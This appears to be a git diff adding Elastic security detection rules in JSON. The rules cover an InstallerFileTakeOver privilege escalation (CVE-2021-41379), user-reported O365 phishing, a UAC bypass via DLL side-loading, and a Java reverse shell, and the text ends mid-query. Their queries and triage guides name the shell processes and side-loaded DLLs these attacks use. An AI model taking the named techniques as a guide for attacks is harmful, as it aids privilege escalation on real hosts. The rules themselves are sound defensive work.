`process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", + "references": [ + "https://github.com/klinix5/InstallerFileTakeOver" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "58c6d58b-a0d3-412d-b3b8-0981a9400607_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json new file mode 100644 index 00000000000..bc85b55087e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/58c6d58b-a0d3-412d-b3b8-0981a9400607_111.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via InstallerFileTakeOver", + "note": "## Triage and analysis\n\n### Investigating Potential Privilege Escalation via InstallerFileTakeOver\n\nInstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY.\n\nThis rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n", + "references": [ + "https://github.com/klinix5/InstallerFileTakeOver" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "58c6d58b-a0d3-412d-b3b8-0981a9400607_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json new file mode 100644 index 00000000000..eb1228a0759 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_103.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json new file mode 100644 index 00000000000..4783e976563 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_105.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json new file mode 100644 index 00000000000..8a48544a61a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_206.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks.", + "false_positives": [ + "Legitimate files reported by the users" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Email Reported by User as Malware or Phish", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n", + "references": [ + "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "rule.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5930658c-2107-4afc-91af-e0e55b7f7184", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "5930658c-2107-4afc-91af-e0e55b7f7184_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json new file mode 100644 index 00000000000..44b370f1bb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_108.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", + "query": "file where host.os.type == \"windows\" and event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", \"C:\\\\Windows\\\\WinSxS\\\\*\")\n", + "references": [ + "https://github.com/hfiref0x/UACME", + "https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json new file mode 100644 index 00000000000..2ba894d18cd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_109.json @@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. Attackers may attempt to bypass UAC to stealthily execute code with elevated permissions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "UAC Bypass Attempt via Privileged IFileOperation COM Interface", + "query": "file where host.os.type == \"windows\" and event.type : \"change\" and process.name : \"dllhost.exe\" and\n /* Known modules names side loaded into process running with high or system integrity level for UAC Bypass, update here for new modules */\n file.name : (\"wow64log.dll\", \"comctl32.dll\", \"DismCore.dll\", \"OskSupport.dll\", \"duser.dll\", \"Accessibility.ni.dll\") and\n /* has no impact on rule logic just to avoid OS install related FPs */\n not file.path : (\"C:\\\\Windows\\\\SoftwareDistribution\\\\*\", \"C:\\\\Windows\\\\WinSxS\\\\*\")\n", + "references": [ + "https://github.com/hfiref0x/UACME", + "https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json new file mode 100644 index 00000000000..ce466f983e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_8.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Java", + "query": "sequence by host.id with maxspan=5s\n [network where host.os.type == \"linux\" and event.action in (\"connection_accepted\", \"connection_attempted\") and \n process.executable : (\"/usr/bin/java\", \"/bin/java\", \"/usr/lib/jvm/*\", \"/usr/java/*\") and \n not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )] by process.entity_id\n [process where host.os.type == \"linux\" and event.action == \"exec\" and \n process.parent.executable : (\"/usr/bin/java\", \"/bin/java\", \"/usr/lib/jvm/*\", 